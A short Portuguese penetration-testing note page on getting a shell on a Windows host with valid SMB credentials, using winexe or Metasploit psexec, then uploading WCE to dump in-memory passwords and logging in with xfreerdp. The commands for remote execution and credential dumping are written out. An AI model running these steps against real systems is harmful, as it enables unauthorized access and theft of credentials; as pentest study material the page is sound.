Obtendo shell no host
Vamos supor que o TS não esteja habilitado e só conseguimos validar o SMB. Podemos utilizar as credenciais para obter acesso e executar comandos no servidor. Para isso vamos utilizar o winexe.
winexe -U <usuario>%<senha> //<ip servidor> cmd.exeOu podemos utilizar o módulo do metasploit chamado psexec.
msf > search psexecApós conseguir um meterpreter podemos fazer o upload do wce64.exe e buscar as informações em memória.
upload usr/share/windows-resources/wce/wce64.exe c:C:\>wce64.exe -wApós isso, se tivermos sucesso descobrindo alguma outra senha, podemos utilizar o xfreerdp para fazer o login.
xfreerdp /u:<usuário adm> /p:<senha adm> /v:<host>Last updated
Was this helpful?